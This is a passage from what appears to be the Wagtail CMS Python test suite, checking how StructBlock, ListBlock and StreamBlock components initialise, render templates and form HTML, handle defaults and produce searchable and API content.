class LinkBlock(blocks.StructBlock):
title = CharBlockWithDeclarations(default="Torchbox")
link = blocks.URLBlock(default="http://www.torchbox.com")
block = LinkBlock()
self.assertIn('<script type="text/x-html-template">hello world</script>', block.all_html_declarations())
def test_searchable_content(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = LinkBlock()
content = block.get_searchable_content(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}))
self.assertEqual(content, ["Wagtail site"])
def test_value_from_datadict(self):
block = blocks.StructBlock([
('title', blocks.CharBlock()),
('link', blocks.URLBlock()),
])
struct_val = block.value_from_datadict({
'mylink-title': "Torchbox",
'mylink-link': "http://www.torchbox.com"
}, {}, 'mylink')
self.assertEqual(struct_val['title'], "Torchbox")
self.assertEqual(struct_val['link'], "http://www.torchbox.com")
self.assertTrue(isinstance(struct_val, blocks.StructValue))
self.assertTrue(isinstance(struct_val.bound_blocks['link'].block, blocks.URLBlock))
def test_value_omitted_from_data(self):
block = blocks.StructBlock([
('title', blocks.CharBlock()),
('link', blocks.URLBlock()),
])
# overall value is considered present in the form if any sub-field is present
self.assertFalse(block.value_omitted_from_data({'mylink-title': 'Torchbox'}, {}, 'mylink'))
self.assertTrue(block.value_omitted_from_data({'nothing-here': 'nope'}, {}, 'mylink'))
def test_default_is_returned_as_structvalue(self):
"""When returning the default value of a StructBlock (e.g. because it's
a child of another StructBlock, and the outer value is missing that key)
we should receive it as a StructValue, not just a plain dict"""
class PersonBlock(blocks.StructBlock):
first_name = blocks.CharBlock()
surname = blocks.CharBlock()
class EventBlock(blocks.StructBlock):
title = blocks.CharBlock()
guest_speaker = PersonBlock(default={'first_name': 'Ed', 'surname': 'Balls'})
event_block = EventBlock()
event = event_block.to_python({'title': 'Birthday party'})
self.assertEqual(event['guest_speaker']['first_name'], 'Ed')
self.assertTrue(isinstance(event['guest_speaker'], blocks.StructValue))
def test_default_value_is_distinct_instance(self):
"""
Whenever the default value of a StructBlock is invoked, it should be a distinct
instance of the dict so that modifying it doesn't modify other places where the
default value appears.
"""
class PersonBlock(blocks.StructBlock):
first_name = blocks.CharBlock()
surname = blocks.CharBlock()
class EventBlock(blocks.StructBlock):
title = blocks.CharBlock()
guest_speaker = PersonBlock(default={'first_name': 'Ed', 'surname': 'Balls'})
event_block = EventBlock()
event1 = event_block.to_python({'title': 'Birthday party'}) # guest_speaker will default to Ed Balls
event2 = event_block.to_python({'title': 'Christmas party'}) # guest_speaker will default to Ed Balls, but a distinct instance
event1['guest_speaker']['surname'] = 'Miliband'
self.assertEqual(event1['guest_speaker']['surname'], 'Miliband')
# event2 should not be modified
self.assertEqual(event2['guest_speaker']['surname'], 'Balls')
def test_bulk_to_python_returns_distinct_default_instances(self):
"""
Whenever StructBlock.bulk_to_python invokes a child block's get_default method to
fill in missing fields, it should use a separate invocation for each record so that
we don't end up with the same instance of a mutable value on multiple records
"""
class ShoppingListBlock(blocks.StructBlock):
shop = blocks.CharBlock()
items = blocks.ListBlock(blocks.CharBlock(default='chocolate'))
block = ShoppingListBlock()
shopping_lists = block.bulk_to_python([
{'shop': 'Tesco'}, # 'items' defaults to ['chocolate']
{'shop': 'Asda'}, # 'items' defaults to ['chocolate'], but a distinct instance
])
shopping_lists[0]['items'].append('cake')
self.assertEqual(shopping_lists[0]['items'], ['chocolate', 'cake'])
# shopping_lists[1] should not be updated
self.assertEqual(shopping_lists[1]['items'], ['chocolate'])
def test_clean(self):
block = blocks.StructBlock([
('title', blocks.CharBlock()),
('link', blocks.URLBlock()),
])
value = block.to_python({'title': 'Torchbox', 'link': 'http://www.torchbox.com/'})
clean_value = block.clean(value)
self.assertTrue(isinstance(clean_value, blocks.StructValue))
self.assertEqual(clean_value['title'], 'Torchbox')
value = block.to_python({'title': 'Torchbox', 'link': 'not a url'})
with self.assertRaises(ValidationError):
block.clean(value)
def test_bound_blocks_are_available_on_template(self):
"""
Test that we are able to use value.bound_blocks within templates
to access a child block's own HTML rendering
"""
block = SectionBlock()
value = block.to_python({'title': 'Hello', 'body': '<i>italic</i> world'})
result = block.render(value)
self.assertEqual(result, """<h1>Hello</h1><i>italic</i> world""")
def test_render_block_with_extra_context(self):
block = SectionBlock()
value = block.to_python({'title': 'Bonjour', 'body': 'monde <i>italique</i>'})
result = block.render(value, context={'language': 'fr'})
self.assertEqual(result, """<h1 lang="fr">Bonjour</h1>monde <i>italique</i>""")
def test_render_structvalue(self):
"""
The HTML representation of a StructValue should use the block's template
"""
block = SectionBlock()
value = block.to_python({'title': 'Hello', 'body': '<i>italic</i> world'})
result = value.__html__()
self.assertEqual(result, """<h1>Hello</h1><i>italic</i> world""")
# value.render_as_block() should be equivalent to value.__html__()
result = value.render_as_block()
self.assertEqual(result, """<h1>Hello</h1><i>italic</i> world""")
def test_str_structvalue(self):
"""
The str() representation of a StructValue should NOT render the template, as that's liable
to cause an infinite loop if any debugging / logging code attempts to log the fact that
it rendered a template with this object in the context:
https://github.com/wagtail/wagtail/issues/2874
https://github.com/jazzband/django-debug-toolbar/issues/950
"""
block = SectionBlock()
value = block.to_python({'title': 'Hello', 'body': '<i>italic</i> world'})
result = str(value)
self.assertNotIn('<h1>', result)
# The expected rendering should correspond to the native representation of an OrderedDict:
# "StructValue([('title', u'Hello'), ('body', <wagtail.core.rich_text.RichText object at 0xb12d5eed>)])"
# - give or take some quoting differences between Python versions
self.assertIn('StructValue', result)
self.assertIn('title', result)
self.assertIn('Hello', result)
def test_render_structvalue_with_extra_context(self):
block = SectionBlock()
value = block.to_python({'title': 'Bonjour', 'body': 'monde <i>italique</i>'})
result = value.render_as_block(context={'language': 'fr'})
self.assertEqual(result, """<h1 lang="fr">Bonjour</h1>monde <i>italique</i>""")
class TestStructBlockWithCustomStructValue(SimpleTestCase):
def test_initialisation(self):
class CustomStructValue(blocks.StructValue):
def joined(self):
return self.get('title', '') + self.get('link', '')
block = blocks.StructBlock([
('title', blocks.CharBlock()),
('link', blocks.URLBlock()),
], value_class=CustomStructValue)
self.assertEqual(list(block.child_blocks.keys()), ['title', 'link'])
block_value = block.to_python({'title': 'Birthday party', 'link': 'https://myparty.co.uk'})
self.assertIsInstance(block_value, CustomStructValue)
default_value = block.get_default()
self.assertIsInstance(default_value, CustomStructValue)
value_from_datadict = block.value_from_datadict({
'mylink-title': "Torchbox",
'mylink-link': "http://www.torchbox.com"
}, {}, 'mylink')
self.assertIsInstance(value_from_datadict, CustomStructValue)
value = block.to_python({'title': 'Torchbox', 'link': 'http://www.torchbox.com/'})
clean_value = block.clean(value)
self.assertTrue(isinstance(clean_value, CustomStructValue))
self.assertEqual(clean_value['title'], 'Torchbox')
value = block.to_python({'title': 'Torchbox', 'link': 'not a url'})
with self.assertRaises(ValidationError):
block.clean(value)
def test_initialisation_from_subclass(self):
class LinkStructValue(blocks.StructValue):
def url(self):
return self.get('page') or self.get('link')
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
page = blocks.PageChooserBlock(required=False)
link = blocks.URLBlock(required=False)
class Meta:
value_class = LinkStructValue
block = LinkBlock()
self.assertEqual(list(block.child_blocks.keys()), ['title', 'page', 'link'])
block_value = block.to_python({'title': 'Website', 'link': 'https://website.com'})
self.assertIsInstance(block_value, LinkStructValue)
default_value = block.get_default()
self.assertIsInstance(default_value, LinkStructValue)
def test_initialisation_with_multiple_subclassses(self):
class LinkStructValue(blocks.StructValue):
def url(self):
return self.get('page') or self.get('link')
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
page = blocks.PageChooserBlock(required=False)
link = blocks.URLBlock(required=False)
class Meta:
value_class = LinkStructValue
class StyledLinkBlock(LinkBlock):
classname = blocks.CharBlock()
block = StyledLinkBlock()
self.assertEqual(list(block.child_blocks.keys()), ['title', 'page', 'link', 'classname'])
value_from_datadict = block.value_from_datadict({
'queen-title': "Torchbox",
'queen-link': "http://www.torchbox.com",
'queen-classname': "fullsize",
}, {}, 'queen')
self.assertIsInstance(value_from_datadict, LinkStructValue)
def test_initialisation_with_mixins(self):
class LinkStructValue(blocks.StructValue):
pass
class StylingMixinStructValue(blocks.StructValue):
pass
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
class Meta:
value_class = LinkStructValue
class StylingMixin(blocks.StructBlock):
classname = blocks.CharBlock()
class StyledLinkBlock(StylingMixin, LinkBlock):
source = blocks.CharBlock()
block = StyledLinkBlock()
self.assertEqual(list(block.child_blocks.keys()),
['title', 'link', 'classname', 'source'])
block_value = block.to_python({
'title': 'Website', 'link': 'https://website.com',
'source': 'google', 'classname': 'full-size',
})
self.assertIsInstance(block_value, LinkStructValue)
def test_value_property(self):
class SectionStructValue(blocks.StructValue):
@property
def foo(self):
return 'bar %s' % self.get('title', '')
class SectionBlock(blocks.StructBlock):
title = blocks.CharBlock()
body = blocks.RichTextBlock()
class Meta:
value_class = SectionStructValue
block = SectionBlock()
struct_value = block.to_python({'title': 'hello', 'body': '<b>world</b>'})
value = struct_value.foo
self.assertEqual(value, 'bar hello')
def test_render_with_template(self):
class SectionStructValue(blocks.StructValue):
def title_with_suffix(self):
title = self.get('title')
if title:
return 'SUFFIX %s' % title
return 'EMPTY TITLE'
class SectionBlock(blocks.StructBlock):
title = blocks.CharBlock(required=False)
class Meta:
value_class = SectionStructValue
block = SectionBlock(template='tests/blocks/struct_block_custom_value.html')
struct_value = block.to_python({'title': 'hello'})
html = block.render(struct_value)
self.assertEqual(html, '<div>SUFFIX hello</div>\n')
struct_value = block.to_python({})
html = block.render(struct_value)
self.assertEqual(html, '<div>EMPTY TITLE</div>\n')
class TestListBlock(WagtailTestUtils, SimpleTestCase):
def test_initialise_with_class(self):
block = blocks.ListBlock(blocks.CharBlock)
# Child block should be initialised for us
self.assertIsInstance(block.child_block, blocks.CharBlock)
def test_initialise_with_instance(self):
child_block = blocks.CharBlock()
block = blocks.ListBlock(child_block)
self.assertEqual(block.child_block, child_block)
def render(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = blocks.ListBlock(LinkBlock())
return block.render([
{
'title': "Wagtail",
'link': 'http://www.wagtail.io',
},
{
'title': "Django",
'link': 'http://www.djangoproject.com',
},
])
def test_render_uses_ul(self):
html = self.render()
self.assertIn('<ul>', html)
self.assertIn('</ul>', html)
def test_render_uses_li(self):
html = self.render()
self.assertIn('<li>', html)
self.assertIn('</li>', html)
def test_render_calls_block_render_on_children(self):
"""
The default rendering of a ListBlock should invoke the block's render method
on each child, rather than just outputting the child value as a string.
"""
block = blocks.ListBlock(
blocks.CharBlock(template='tests/blocks/heading_block.html')
)
html = block.render(["Hello world!", "Goodbye world!"])
self.assertIn('<h1>Hello world!</h1>', html)
self.assertIn('<h1>Goodbye world!</h1>', html)
def test_render_passes_context_to_children(self):
"""
Template context passed to the render method should be passed on
to the render method of the child block.
"""
block = blocks.ListBlock(
blocks.CharBlock(template='tests/blocks/heading_block.html')
)
html = block.render(["Bonjour le monde!", "Au revoir le monde!"], context={
'language': 'fr',
})
self.assertIn('<h1 lang="fr">Bonjour le monde!</h1>', html)
self.assertIn('<h1 lang="fr">Au revoir le monde!</h1>', html)
def test_get_api_representation_calls_same_method_on_children_with_context(self):
"""
The get_api_representation method of a ListBlock should invoke
the block's get_api_representation method on each child and
the context should be passed on.
"""
class ContextBlock(blocks.CharBlock):
def get_api_representation(self, value, context=None):
return context[value]
block = blocks.ListBlock(
ContextBlock()
)
api_representation = block.get_api_representation(["en", "fr"], context={
'en': 'Hello world!',
'fr': 'Bonjour le monde!'
})
self.assertEqual(
api_representation, ['Hello world!', 'Bonjour le monde!']
)
def render_form(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = blocks.ListBlock(LinkBlock)
html = block.render_form([
{
'title': "Wagtail",
'link': 'http://www.wagtail.io',
},
{
'title': "Django",
'link': 'http://www.djangoproject.com',
},
], prefix='links')
return html
def test_render_form_wrapper_class(self):
html = self.render_form()
self.assertIn('<div class="c-sf-container">', html)
def test_render_form_count_field(self):
html = self.render_form()
self.assertIn('<input type="hidden" name="links-count" id="links-count" value="2">', html)
def test_render_form_delete_field(self):
html = self.render_form()
self.assertIn('<input type="hidden" id="links-0-deleted" name="links-0-deleted" value="">', html)
def test_render_form_order_fields(self):
html = self.render_form()
self.assertIn('<input type="hidden" id="links-0-order" name="links-0-order" value="0">', html)
self.assertIn('<input type="hidden" id="links-1-order" name="links-1-order" value="1">', html)
def test_render_form_labels(self):
html = self.render_form()
self.assertIn('<label class="field__label" for="links-0-value-title">Title</label>', html)
self.assertIn('<label class="field__label" for="links-0-value-link">Link</label>', html)
def test_render_form_values(self):
html = self.render_form()
self.assertInHTML(
(
'<input id="links-0-value-title" name="links-0-value-title" placeholder="Title"'
' type="text" value="Wagtail" />'
),
html
)
self.assertInHTML(
(
'<input id="links-0-value-link" name="links-0-value-link" placeholder="Link" type="url"'
' value="http://www.wagtail.io" />'
),
html
)
self.assertInHTML(
(
'<input id="links-1-value-title" name="links-1-value-title" placeholder="Title" type="text"'
' value="Django" />'
),
html
)
self.assertInHTML(
(
'<input id="links-1-value-link" name="links-1-value-link" placeholder="Link"'
' type="url" value="http://www.djangoproject.com" />'
),
html
)
def test_html_declarations(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = blocks.ListBlock(LinkBlock)
html = block.html_declarations()
self.assertTagInTemplateScript(
'<input id="__PREFIX__-value-title" name="__PREFIX__-value-title" placeholder="Title" type="text" />',
html
)
self.assertTagInTemplateScript(
'<input id="__PREFIX__-value-link" name="__PREFIX__-value-link" placeholder="Link" type="url" />',
html
)
def test_html_declarations_uses_default(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock(default="Github")
link = blocks.URLBlock(default="http://www.github.com")
block = blocks.ListBlock(LinkBlock)
html = block.html_declarations()
self.assertTagInTemplateScript(
(
'<input id="__PREFIX__-value-title" name="__PREFIX__-value-title" placeholder="Title"'
' type="text" value="Github" />'
),
html
)
self.assertTagInTemplateScript(
(
'<input id="__PREFIX__-value-link" name="__PREFIX__-value-link" placeholder="Link"'
' type="url" value="http://www.github.com" />'
),
html
)
def test_media_inheritance(self):
class ScriptedCharBlock(blocks.CharBlock):
media = forms.Media(js=['scripted_char_block.js'])
block = blocks.ListBlock(ScriptedCharBlock())
self.assertIn('scripted_char_block.js', ''.join(block.all_media().render_js()))
def test_html_declaration_inheritance(self):
class CharBlockWithDeclarations(blocks.CharBlock):
def html_declarations(self):
return '<script type="text/x-html-template">hello world</script>'
block = blocks.ListBlock(CharBlockWithDeclarations())
self.assertIn('<script type="text/x-html-template">hello world</script>', block.all_html_declarations())
def test_searchable_content(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = blocks.ListBlock(LinkBlock())
content = block.get_searchable_content([
{
'title': "Wagtail",
'link': 'http://www.wagtail.io',
},
{
'title': "Django",
'link': 'http://www.djangoproject.com',
},
])
self.assertEqual(content, ["Wagtail", "Django"])
def test_value_omitted_from_data(self):
block = blocks.ListBlock(blocks.CharBlock())
# overall value is considered present in the form if the 'count' field is present
self.assertFalse(block.value_omitted_from_data({'mylist-count': '0'}, {}, 'mylist'))
self.assertFalse(block.value_omitted_from_data({
'mylist-count': '1',
'mylist-0-value': 'hello', 'mylist-0-deleted': '', 'mylist-0-order': '0'
}, {}, 'mylist'))
self.assertTrue(block.value_omitted_from_data({'nothing-here': 'nope'}, {}, 'mylist'))
def test_ordering_in_form_submission_uses_order_field(self):
block = blocks.ListBlock(blocks.CharBlock())
# check that items are ordered by the 'order' field, not the order they appear in the form
post_data = {'shoppinglist-count': '3'}
for i in range(0, 3):
post_data.update({
'shoppinglist-%d-deleted' % i: '',
'shoppinglist-%d-order' % i: str(2 - i),
'shoppinglist-%d-value' % i: "item %d" % i
})
block_value = block.value_from_datadict(post_data, {}, 'shoppinglist')
self.assertEqual(block_value[2], "item 0")
def test_ordering_in_form_submission_is_numeric(self):
block = blocks.ListBlock(blocks.CharBlock())
# check that items are ordered by 'order' numerically, not alphabetically
post_data = {'shoppinglist-count': '12'}
for i in range(0, 12):
post_data.update({
'shoppinglist-%d-deleted' % i: '',
'shoppinglist-%d-order' % i: str(i),
'shoppinglist-%d-value' % i: "item %d" % i
})
block_value = block.value_from_datadict(post_data, {}, 'shoppinglist')
self.assertEqual(block_value[2], "item 2")
def test_can_specify_default(self):
class ShoppingListBlock(blocks.StructBlock):
shop = blocks.CharBlock()
items = blocks.ListBlock(blocks.CharBlock(), default=['peas', 'beans', 'carrots'])
block = ShoppingListBlock()
# the value here does not specify an 'items' field, so this should revert to the ListBlock's default
form_html = block.render_form(block.to_python({'shop': 'Tesco'}), prefix='shoppinglist')
self.assertIn(
'<input type="hidden" name="shoppinglist-items-count" id="shoppinglist-items-count" value="3">',
form_html
)
self.assertIn('value="peas"', form_html)
def test_default_default(self):
"""
if no explicit 'default' is set on the ListBlock, it should fall back on
a single instance of the child block in its default state.
"""
class ShoppingListBlock(blocks.StructBlock):
shop = blocks.CharBlock()
items = blocks.ListBlock(blocks.CharBlock(default='chocolate'))
block = ShoppingListBlock()
# the value here does not specify an 'items' field, so this should revert to the ListBlock's default
form_html = block.render_form(block.to_python({'shop': 'Tesco'}), prefix='shoppinglist')
self.assertIn(
'<input type="hidden" name="shoppinglist-items-count" id="shoppinglist-items-count" value="1">',
form_html
)
self.assertIn('value="chocolate"', form_html)
def test_default_value_is_distinct_instance(self):
"""
Whenever the default value of a ListBlock is invoked, it should be a distinct
instance of the list so that modifying it doesn't modify other places where the
default value appears.
"""
class ShoppingListBlock(blocks.StructBlock):
shop = blocks.CharBlock()
items = blocks.ListBlock(blocks.CharBlock(default='chocolate'))
block = ShoppingListBlock()
tesco_shopping = block.to_python({'shop': 'Tesco'}) # 'items' will default to ['chocolate']
asda_shopping = block.to_python({'shop': 'Asda'}) # 'items' will default to ['chocolate'], but a distinct instance
tesco_shopping['items'].append('cake')
self.assertEqual(tesco_shopping['items'], ['chocolate', 'cake'])
# asda_shopping should not be modified
self.assertEqual(asda_shopping['items'], ['chocolate'])
def test_render_with_classname_via_kwarg(self):
"""form_classname from kwargs to be used as an additional class when rendering list block"""
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = blocks.ListBlock(LinkBlock, form_classname='special-list-class')
html = block.render_form([
{
'title': "Wagtail",
'link': 'http://www.wagtail.io',
},
{
'title': "Django",
'link': 'http://www.djangoproject.com',
},
], prefix='links')
# including leading space to ensure class name gets added correctly
self.assertEqual(html.count(' special-list-class'), 1)
def test_render_with_classname_via_class_meta(self):
"""form_classname from meta to be used as an additional class when rendering list block"""
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
class CustomListBlock(blocks.ListBlock):
class Meta:
form_classname = 'custom-list-class'
block = CustomListBlock(LinkBlock)
html = block.render_form([
{
'title': "Wagtail",
'link': 'http://www.wagtail.io',
},
{
'title': "Django",
'link': 'http://www.djangoproject.com',
},
], prefix='links')
# including leading space to ensure class name gets added correctly
self.assertEqual(html.count(' custom-list-class'), 1)
class TestListBlockWithFixtures(TestCase):
fixtures = ['test.json']
def test_calls_child_bulk_to_python_when_available(self):
page_ids = [2, 3, 4, 5]
expected_pages = Page.objects.filter(pk__in=page_ids)
block = blocks.ListBlock(blocks.PageChooserBlock())
with self.assertNumQueries(1):
pages = block.to_python(page_ids)
self.assertSequenceEqual(pages, expected_pages)
def test_bulk_to_python(self):
block = blocks.ListBlock(blocks.PageChooserBlock())
with self.assertNumQueries(1):
result = block.bulk_to_python([[4, 5], [], [2]])
self.assertEqual(result, [
[Page.objects.get(id=4), Page.objects.get(id=5)],
[],
[Page.objects.get(id=2)],
])
class TestStreamBlock(WagtailTestUtils, SimpleTestCase):
def test_initialisation(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock()),
('paragraph', blocks.CharBlock()),
])
self.assertEqual(list(block.child_blocks.keys()), ['heading', 'paragraph'])
def test_initialisation_with_binary_string_names(self):
# migrations will sometimes write out names as binary strings, just to keep us on our toes
block = blocks.StreamBlock([
(b'heading', blocks.CharBlock()),
(b'paragraph', blocks.CharBlock()),
])
self.assertEqual(list(block.child_blocks.keys()), [b'heading', b'paragraph'])
def test_initialisation_from_subclass(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
self.assertEqual(list(block.child_blocks.keys()), ['heading', 'paragraph'])
def test_initialisation_from_subclass_with_extra(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock([
('intro', blocks.CharBlock())
])
self.assertEqual(list(block.child_blocks.keys()), ['heading', 'paragraph', 'intro'])
def test_initialisation_with_multiple_subclassses(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
class ArticleWithIntroBlock(ArticleBlock):
intro = blocks.CharBlock()
block = ArticleWithIntroBlock()
self.assertEqual(list(block.child_blocks.keys()), ['heading', 'paragraph', 'intro'])
def test_initialisation_with_mixins(self):
"""
The order of child blocks of a ``StreamBlock`` with multiple parent
classes is slightly surprising at first. Child blocks are inherited in
a bottom-up order, by traversing the MRO in reverse. In the example
below, ``ArticleWithIntroBlock`` will have an MRO of::
[ArticleWithIntroBlock, IntroMixin, ArticleBlock, StreamBlock, ...]
This will result in ``intro`` appearing *after* ``heading`` and
``paragraph`` in ``ArticleWithIntroBlock.child_blocks``, even though
``IntroMixin`` appeared before ``ArticleBlock``.
"""
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
class IntroMixin(blocks.StreamBlock):
intro = blocks.CharBlock()
class ArticleWithIntroBlock(IntroMixin, ArticleBlock):
by_line = blocks.CharBlock()
block = ArticleWithIntroBlock()
self.assertEqual(list(block.child_blocks.keys()),
['heading', 'paragraph', 'intro', 'by_line'])
def test_field_has_changed(self):
block = blocks.StreamBlock([('paragraph', blocks.CharBlock())])
initial_value = blocks.StreamValue(block, [('paragraph', 'test')])
initial_value[0].id = 'a'
data_value = blocks.StreamValue(block, [('paragraph', 'test')])
data_value[0].id = 'a'
# identical ids and content, so has_changed should return False
self.assertFalse(blocks.BlockField(block).has_changed(initial_value, data_value))
changed_data_value = blocks.StreamValue(block, [('paragraph', 'not a test')])
changed_data_value[0].id = 'a'
# identical ids but changed content, so has_changed should return True
self.assertTrue(blocks.BlockField(block).has_changed(initial_value, changed_data_value))
def test_required_raises_an_exception_if_empty(self):
block = blocks.StreamBlock([('paragraph', blocks.CharBlock())], required=True)
value = blocks.StreamValue(block, [])
with self.assertRaises(blocks.StreamBlockValidationError):
block.clean(value)
def test_required_does_not_raise_an_exception_if_not_empty(self):
block = blocks.StreamBlock([('paragraph', blocks.CharBlock())], required=True)
value = block.to_python([{'type': 'paragraph', 'value': 'Hello'}])
try:
block.clean(value)
except blocks.StreamBlockValidationError:
raise self.failureException("%s was raised" % blocks.StreamBlockValidationError)
def test_not_required_does_not_raise_an_exception_if_empty(self):
block = blocks.StreamBlock([('paragraph', blocks.CharBlock())], required=False)
value = blocks.StreamValue(block, [])
try:
block.clean(value)
except blocks.StreamBlockValidationError:
raise self.failureException("%s was raised" % blocks.StreamBlockValidationError)
def test_required_by_default(self):
block = blocks.StreamBlock([('paragraph', blocks.CharBlock())])
value = blocks.StreamValue(block, [])
with self.assertRaises(blocks.StreamBlockValidationError):
block.clean(value)
def render_article(self, data):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.RichTextBlock()
block = ArticleBlock()
value = block.to_python(data)
return block.render(value)
def test_get_api_representation_calls_same_method_on_children_with_context(self):
"""
The get_api_representation method of a StreamBlock should invoke
the block's get_api_representation method on each child and
the context should be passed on.
"""
class ContextBlock(blocks.CharBlock):
def get_api_representation(self, value, context=None):
return context[value]
block = blocks.StreamBlock([
('language', ContextBlock()),
('author', ContextBlock()),
])
api_representation = block.get_api_representation(
block.to_python([
{'type': 'language', 'value': 'en'},
{'type': 'author', 'value': 'wagtail', 'id': '111111'},
]),
context={
'en': 'English',
'wagtail': 'Wagtail!'
}
)
self.assertListEqual(
api_representation, [
{'type': 'language', 'value': 'English', 'id': None},
{'type': 'author', 'value': 'Wagtail!', 'id': '111111'},
]
)
def test_render(self):
html = self.render_article([
{
'type': 'heading',
'value': "My title",
},
{
'type': 'paragraph',
'value': 'My <i>first</i> paragraph',
},
{
'type': 'paragraph',
'value': 'My second paragraph',
},
])
self.assertIn('<div class="block-heading">My title</div>', html)
self.assertIn('<div class="block-paragraph">My <i>first</i> paragraph</div>', html)
self.assertIn('<div class="block-paragraph">My second paragraph</div>', html)
def test_render_unknown_type(self):
# This can happen if a developer removes a type from their StreamBlock
html = self.render_article([
{
'type': 'foo',
'value': "Hello",
},
{
'type': 'paragraph',
'value': 'My first paragraph',
},
])
self.assertNotIn('foo', html)
self.assertNotIn('Hello', html)
self.assertIn('<div class="block-paragraph">My first paragraph</div>', html)
def test_render_calls_block_render_on_children(self):
"""
The default rendering of a StreamBlock should invoke the block's render method
on each child, rather than just outputting the child value as a string.
"""
block = blocks.StreamBlock([
('heading', blocks.CharBlock(template='tests/blocks/heading_block.html')),
('paragraph', blocks.CharBlock()),
])
value = block.to_python([
{'type': 'heading', 'value': 'Hello'}
])
html = block.render(value)
self.assertIn('<div class="block-heading"><h1>Hello</h1></div>', html)
# calling render_as_block() on value (a StreamValue instance)
# should be equivalent to block.render(value)
html = value.render_as_block()
self.assertIn('<div class="block-heading"><h1>Hello</h1></div>', html)
def test_render_passes_context_to_children(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock(template='tests/blocks/heading_block.html')),
('paragraph', blocks.CharBlock()),
])
value = block.to_python([
{'type': 'heading', 'value': 'Bonjour'}
])
html = block.render(value, context={
'language': 'fr',
})
self.assertIn('<div class="block-heading"><h1 lang="fr">Bonjour</h1></div>', html)
# calling render_as_block(context=foo) on value (a StreamValue instance)
# should be equivalent to block.render(value, context=foo)
html = value.render_as_block(context={
'language': 'fr',
})
self.assertIn('<div class="block-heading"><h1 lang="fr">Bonjour</h1></div>', html)
def test_render_on_stream_child_uses_child_template(self):
"""
Accessing a child element of the stream (giving a StreamChild object) and rendering it
should use the block template, not just render the value's string representation
"""
block = blocks.StreamBlock([
('heading', blocks.CharBlock(template='tests/blocks/heading_block.html')),
('paragraph', blocks.CharBlock()),
])
value = block.to_python([
{'type': 'heading', 'value': 'Hello'}
])
html = value[0].render()
self.assertEqual('<h1>Hello</h1>', html)
# StreamChild.__str__ should do the same
html = str(value[0])
self.assertEqual('<h1>Hello</h1>', html)
# and so should StreamChild.render_as_block
html = value[0].render_as_block()
self.assertEqual('<h1>Hello</h1>', html)
def test_can_pass_context_to_stream_child_template(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock(template='tests/blocks/heading_block.html')),
('paragraph', blocks.CharBlock()),
])
value = block.to_python([
{'type': 'heading', 'value': 'Bonjour'}
])
html = value[0].render(context={'language': 'fr'})
self.assertEqual('<h1 lang="fr">Bonjour</h1>', html)
# the same functionality should be available through the alias `render_as_block`
html = value[0].render_as_block(context={'language': 'fr'})
self.assertEqual('<h1 lang="fr">Bonjour</h1>', html)
def render_form(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
value = block.to_python([
{
'type': 'heading',
'value': "My title",
'id': '123123123',
},
{
'type': 'paragraph',
'value': 'My first paragraph',
},
{
'type': 'paragraph',
'value': 'My second paragraph',
},
])
return block.render_form(value, prefix='myarticle')
def test_render_form_wrapper_class(self):
html = self.render_form()
self.assertIn('<div class="c-sf-container">', html)
def test_render_form_count_field(self):
html = self.render_form()
self.assertIn('<input type="hidden" name="myarticle-count" id="myarticle-count" value="3">', html)
def test_render_form_delete_field(self):
html = self.render_form()
self.assertIn('<input type="hidden" id="myarticle-0-deleted" name="myarticle-0-deleted" value="">', html)
def test_render_form_order_fields(self):
html = self.render_form()
self.assertIn('<input type="hidden" id="myarticle-0-order" name="myarticle-0-order" value="0">', html)
self.assertIn('<input type="hidden" id="myarticle-1-order" name="myarticle-1-order" value="1">', html)
self.assertIn('<input type="hidden" id="myarticle-2-order" name="myarticle-2-order" value="2">', html)
def test_render_form_id_fields(self):
html = self.render_form()
self.assertIn('<input type="hidden" id="myarticle-0-id" name="myarticle-0-id" value="123123123">', html)
self.assertIn('<input type="hidden" id="myarticle-1-id" name="myarticle-1-id" value="">', html)
self.assertIn('<input type="hidden" id="myarticle-2-id" name="myarticle-2-id" value="">', html)
def test_render_form_type_fields(self):
html = self.render_form()
self.assertIn('<input type="hidden" id="myarticle-0-type" name="myarticle-0-type" value="heading">', html)
self.assertIn('<input type="hidden" id="myarticle-1-type" name="myarticle-1-type" value="paragraph">', html)
self.assertIn('<input type="hidden" id="myarticle-2-type" name="myarticle-2-type" value="paragraph">', html)
def test_render_form_value_fields(self):
html = self.render_form()
self.assertInHTML(
(
'<input id="myarticle-0-value" name="myarticle-0-value" placeholder="Heading"'
' type="text" value="My title" />'
),
html
)
self.assertInHTML(
(
'<input id="myarticle-1-value" name="myarticle-1-value" placeholder="Paragraph"'
' type="text" value="My first paragraph" />'
),
html
)
self.assertInHTML(
(
'<input id="myarticle-2-value" name="myarticle-2-value" placeholder="Paragraph"'
' type="text" value="My second paragraph" />'
),
html
)
def test_value_omitted_from_data(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock()),
])
# overall value is considered present in the form if the 'count' field is present
